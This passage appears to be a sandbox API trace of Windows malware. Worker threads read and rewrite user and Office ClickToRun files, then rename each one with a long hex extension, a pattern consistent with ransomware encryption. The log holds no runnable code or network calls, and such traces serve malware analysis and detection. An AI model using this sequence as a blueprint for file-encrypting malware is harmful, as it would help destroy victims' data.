GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0171.653] ReadFile (in: hFile=0x5cc, lpBuffer=0x7909298, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x78e9160 | out: lpBuffer=0x7909298*, lpNumberOfBytesRead=0x0, lpOverlapped=0x78e9160) returned 1 [0171.653] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, 
lpOverlapped=0x723f8f0) returned 1 [0171.670] ReadFile (in: hFile=0x5b0, lpBuffer=0x76d9030, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76b8ef8 | out: lpBuffer=0x76d9030*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76b8ef8) returned 1 [0171.670] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0171.689] ReadFile (in: hFile=0x5d8, lpBuffer=0x752a588, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a450 | out: lpBuffer=0x752a588*, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a450) returned 1 [0171.690] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0171.692] WriteFile (in: hFile=0x590, lpBuffer=0x78e1140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78c1008 | out: lpBuffer=0x78e1140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78c1008) returned 1 [0171.838] RtlInterlockedCompareExchange64 () returned 0x9 [0171.838] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0172.020] NtQueryObject (in: Handle=0x600, ObjectInformationClass=0x1, ObjectInformation=0x77590b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x77590b8, ReturnLength=0x723f8ec) returned 0x0 [0172.021] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", 
lpString2=".D5EDDD417018855924ED1B33984356D93C8295F62596E64F8F56FFC353E99D52" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.D5EDDD417018855924ED1B33984356D93C8295F62596E64F8F56FFC353E99D52") returned="\\Device\\HarddiskVolume1\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.D5EDDD417018855924ED1B33984356D93C8295F62596E64F8F56FFC353E99D52" [0172.021] GetProcessHeap () returned 0x270000 [0172.021] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11a) returned 0x43348a0 [0172.021] NtSetInformationFile (FileHandle=0x600, IoStatusBlock=0x723f8dc, FileInformation=0x43348a0, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0172.146] CloseHandle (hObject=0x600) returned 1 [0172.147] GetProcessHeap () returned 0x270000 [0172.149] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0172.165] RtlInterlockedCompareExchange64 () returned 0x1 [0172.165] GetQueuedCompletionStatus (CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff) Thread: id = 110 os_tid = 0xad4 [0142.355] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.284] WriteFile (in: hFile=0x594, lpBuffer=0x74401a0*, nNumberOfBytesToWrite=0x5600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7420068 | out: lpBuffer=0x74401a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7420068) returned 1 [0155.290] RtlInterlockedCompareExchange64 () returned 0x0 [0155.290] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, 
lpOverlapped=0x72aff60) returned 1 [0155.290] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7420118, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7420118, ReturnLength=0x72aff5c) returned 0x0 [0155.291] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\MasterDescriptor.en-us.xml", lpString2=".7F1EDB124DDB8FA5763530ADEE55A9840CBC11AA9C22DE01643978F07AC5D97D" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\MasterDescriptor.en-us.xml.7F1EDB124DDB8FA5763530ADEE55A9840CBC11AA9C22DE01643978F07AC5D97D") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\MasterDescriptor.en-us.xml.7F1EDB124DDB8FA5763530ADEE55A9840CBC11AA9C22DE01643978F07AC5D97D" [0155.291] GetProcessHeap () returned 0x270000 [0155.291] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x196) returned 0x432df60 [0155.292] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x72aff4c, FileInformation=0x432df60, Length=0x196, FileInformationClass=0xa) returned 0x0 [0155.294] CloseHandle (hObject=0x594) returned 1 [0155.298] GetProcessHeap () returned 0x270000 [0155.299] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7420068 | out: hHeap=0x270000) returned 1 [0155.299] RtlInterlockedCompareExchange64 () returned 0x1 [0155.299] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.302] ReadFile (in: hFile=0x594, lpBuffer=0x74401a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7420068 | out: lpBuffer=0x74401a0*, lpNumberOfBytesRead=0x0, 
lpOverlapped=0x7420068) returned 1 [0155.302] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.341] WriteFile (in: hFile=0x590, lpBuffer=0x74401a0*, nNumberOfBytesToWrite=0x5200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7420068 | out: lpBuffer=0x74401a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7420068) returned 1 [0155.342] RtlInterlockedCompareExchange64 () returned 0x0 [0155.342] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.343] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x7420118, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7420118, ReturnLength=0x72aff5c) returned 0x0 [0155.344] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\MasterDescriptor.x-none.xml", lpString2=".75DB66124330D635E58D015B1CA35820E7BAB0B6F61C3E0FE6BD22E8A67F3C05" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\MasterDescriptor.x-none.xml.75DB66124330D635E58D015B1CA35820E7BAB0B6F61C3E0FE6BD22E8A67F3C05") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\MasterDescriptor.x-none.xml.75DB66124330D635E58D015B1CA35820E7BAB0B6F61C3E0FE6BD22E8A67F3C05" [0155.344] GetProcessHeap () returned 0x270000 [0155.344] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x19a) returned 0x2b9510 [0155.344] NtSetInformationFile 
(FileHandle=0x590, IoStatusBlock=0x72aff4c, FileInformation=0x2b9510, Length=0x19a, FileInformationClass=0xa) returned 0x0 [0155.346] CloseHandle (hObject=0x590) returned 1 [0155.350] GetProcessHeap () returned 0x270000 [0155.351] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7420068 | out: hHeap=0x270000) returned 1 [0155.351] RtlInterlockedCompareExchange64 () returned 0x1 [0155.351] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.354] ReadFile (in: hFile=0x590, lpBuffer=0x74401a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7420068 | out: lpBuffer=0x74401a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7420068) returned 1 [0155.354] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.357] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x7420118, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7420118, ReturnLength=0x72aff5c) returned 0x0 [0155.358] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\stream.x86.x-none.man.dat", lpString2=".7661DBF480A90BFF51B093232C90AFA3CA2A902200EA917B692DFC62223FF80A" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\stream.x86.x-none.man.dat.7661DBF480A90BFF51B093232C90AFA3CA2A902200EA917B692DFC62223FF80A") 
returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\stream.x86.x-none.man.dat.7661DBF480A90BFF51B093232C90AFA3CA2A902200EA917B692DFC62223FF80A" [0155.358] GetProcessHeap () returned 0x270000 [0155.358] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x196) returned 0x432e2b0 [0155.358] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x72aff4c, FileInformation=0x432e2b0, Length=0x196, FileInformationClass=0xa) returned 0x0 [0155.360] CloseHandle (hObject=0x590) returned 1 [0155.361] GetProcessHeap () returned 0x270000 [0155.362] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7420068 | out: hHeap=0x270000) returned 1 [0155.362] RtlInterlockedCompareExchange64 () returned 0x1 [0155.362] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.375] ReadFile (in: hFile=0x58c, lpBuffer=0x7420190, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x7400058 | out: lpBuffer=0x7420190*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7400058) returned 1 [0155.375] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.377] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x7400108, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7400108, ReturnLength=0x72aff5c) returned 0x0 [0155.379] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml", lpString2=".214D653AEC68B28435118E76B5EECC97FE729076E16536A3A4FE51245B9C7140" | 
out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml.214D653AEC68B28435118E76B5EECC97FE729076E16536A3A4FE51245B9C7140") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml.214D653AEC68B28435118E76B5EECC97FE729076E16536A3A4FE51245B9C7140" [0155.379] GetProcessHeap () returned 0x270000 [0155.379] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x132) returned 0x4262a08 [0155.379] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x72aff4c, FileInformation=0x4262a08, Length=0x132, FileInformationClass=0xa) returned 0x0 [0155.380] CloseHandle (hObject=0x58c) returned 1 [0155.383] GetProcessHeap () returned 0x270000 [0155.385] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0155.385] RtlInterlockedCompareExchange64 () returned 0x1 [0155.385] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.389] ReadFile (in: hFile=0x58c, lpBuffer=0x7420190, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x0, lpOverlapped=0x7400058 | out: lpBuffer=0x7420190*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7400058) returned 1 [0155.389] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.390] WriteFile (in: hFile=0x58c, lpBuffer=0x7420190*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7400058 | out: lpBuffer=0x7420190*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7400058) returned 1 [0155.391] RtlInterlockedCompareExchange64 () returned 0x0 [0155.391] 
GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.392] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x7400108, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7400108, ReturnLength=0x72aff5c) returned 0x0 [0155.393] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml", lpString2=".D6A2249DDF8064329033C9A7BBBF3DF511643078853BA3AA136EBCF9A5E87D5C" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml.D6A2249DDF8064329033C9A7BBBF3DF511643078853BA3AA136EBCF9A5E87D5C") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml.D6A2249DDF8064329033C9A7BBBF3DF511643078853BA3AA136EBCF9A5E87D5C" [0155.393] GetProcessHeap () returned 0x270000 [0155.393] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x132) returned 0x42628c0 [0155.393] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x72aff4c, FileInformation=0x42628c0, Length=0x132, FileInformationClass=0xa) returned 0x0 [0155.395] CloseHandle (hObject=0x58c) returned 1 [0155.399] GetProcessHeap () returned 0x270000 [0155.401] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0155.405] RtlInterlockedCompareExchange64 () returned 0x1 [0155.405] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.421] ReadFile (in: hFile=0x5a0, lpBuffer=0x747b318, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, 
lpOverlapped=0x745b1e0 | out: lpBuffer=0x747b318*, lpNumberOfBytesRead=0x0, lpOverlapped=0x745b1e0) returned 1 [0155.421] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.423] NtQueryObject (in: Handle=0x5a0, ObjectInformationClass=0x1, ObjectInformation=0x745b290, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x745b290, ReturnLength=0x72aff5c) returned 0x0 [0155.424] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml", lpString2=".DEAF24BCDA1C26BB18095BD15DD89C02A02ECD1C2A8022FC475615F6A654C85E" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml.DEAF24BCDA1C26BB18095BD15DD89C02A02ECD1C2A8022FC475615F6A654C85E") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml.DEAF24BCDA1C26BB18095BD15DD89C02A02ECD1C2A8022FC475615F6A654C85E" [0155.424] GetProcessHeap () returned 0x270000 [0155.424] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x212) returned 0x368ec0 [0155.424] NtSetInformationFile (FileHandle=0x5a0, IoStatusBlock=0x72aff4c, FileInformation=0x368ec0, Length=0x212, FileInformationClass=0xa) returned 0x0 [0155.426] CloseHandle (hObject=0x5a0) returned 1 [0155.429] GetProcessHeap () returned 0x270000 [0155.430] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x745b1e0 | out: hHeap=0x270000) 
returned 1 [0155.430] RtlInterlockedCompareExchange64 () returned 0x1 [0155.430] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.434] ReadFile (in: hFile=0x5a0, lpBuffer=0x747b318, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x745b1e0 | out: lpBuffer=0x747b318*, lpNumberOfBytesRead=0x0, lpOverlapped=0x745b1e0) returned 1 [0155.435] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.437] NtQueryObject (in: Handle=0x5a0, ObjectInformationClass=0x1, ObjectInformation=0x745b290, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x745b290, ReturnLength=0x72aff5c) returned 0x0 [0155.438] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml", lpString2=".08D54B76EAF56ADF0302F1E50AE36771095D6B4F128CA564E09045D6359F4E2C" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml.08D54B76EAF56ADF0302F1E50AE36771095D6B4F128CA564E09045D6359F4E2C") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml.08D54B76EAF56ADF0302F1E50AE36771095D6B4F128CA564E09045D6359F4E2C" [0155.438] GetProcessHeap () returned 0x270000 [0155.438] 
RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1f4) returned 0x42b5ad8 [0155.439] NtSetInformationFile (FileHandle=0x5a0, IoStatusBlock=0x72aff4c, FileInformation=0x42b5ad8, Length=0x1f4, FileInformationClass=0xa) returned 0x0 [0155.441] CloseHandle (hObject=0x5a0) returned 1 [0155.759] GetProcessHeap () returned 0x270000 [0155.761] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x745b1e0 | out: hHeap=0x270000) returned 1 [0155.761] RtlInterlockedCompareExchange64 () returned 0x1 [0155.761] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.765] ReadFile (in: hFile=0x5a0, lpBuffer=0x747b318, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x745b1e0 | out: lpBuffer=0x747b318*, lpNumberOfBytesRead=0x0, lpOverlapped=0x745b1e0) returned 1 [0155.766] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.766] WriteFile (in: hFile=0x5a0, lpBuffer=0x747b318*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x745b1e0 | out: lpBuffer=0x747b318*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x745b1e0) returned 1 [0155.767] RtlInterlockedCompareExchange64 () returned 0x0 [0155.767] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.768] NtQueryObject (in: Handle=0x5a0, ObjectInformationClass=0x1, ObjectInformation=0x745b290, ObjectInformationLength=0x10004, 
ReturnLength=0x72aff5c | out: ObjectInformation=0x745b290, ReturnLength=0x72aff5c) returned 0x0 [0155.769] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml", lpString2=".88661BF345C76E09AF0B34C5F4B24A6C67182A64B9D1A7F7B3A0B1E0D5D4DF3F" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml.88661BF345C76E09AF0B34C5F4B24A6C67182A64B9D1A7F7B3A0B1E0D5D4DF3F") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml.88661BF345C76E09AF0B34C5F4B24A6C67182A64B9D1A7F7B3A0B1E0D5D4DF3F" [0155.769] GetProcessHeap () returned 0x270000 [0155.769] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x21a) returned 0x3690e8 [0155.770] NtSetInformationFile (FileHandle=0x5a0, IoStatusBlock=0x72aff4c, FileInformation=0x3690e8, Length=0x21a, FileInformationClass=0xa) returned 0x0 [0155.772] CloseHandle (hObject=0x5a0) returned 1 [0155.775] GetProcessHeap () returned 0x270000 [0155.776] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x745b1e0 | out: hHeap=0x270000) returned 1 [0155.776] RtlInterlockedCompareExchange64 () returned 0x1 [0155.776] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.780] ReadFile (in: hFile=0x5a0, lpBuffer=0x747b318, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x745b1e0 | out: lpBuffer=0x747b318*, 
lpNumberOfBytesRead=0x0, lpOverlapped=0x745b1e0) returned 1 [0155.780] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0156.031] ReadFile (in: hFile=0x594, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x2600, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0156.032] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0156.046] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x749a520, 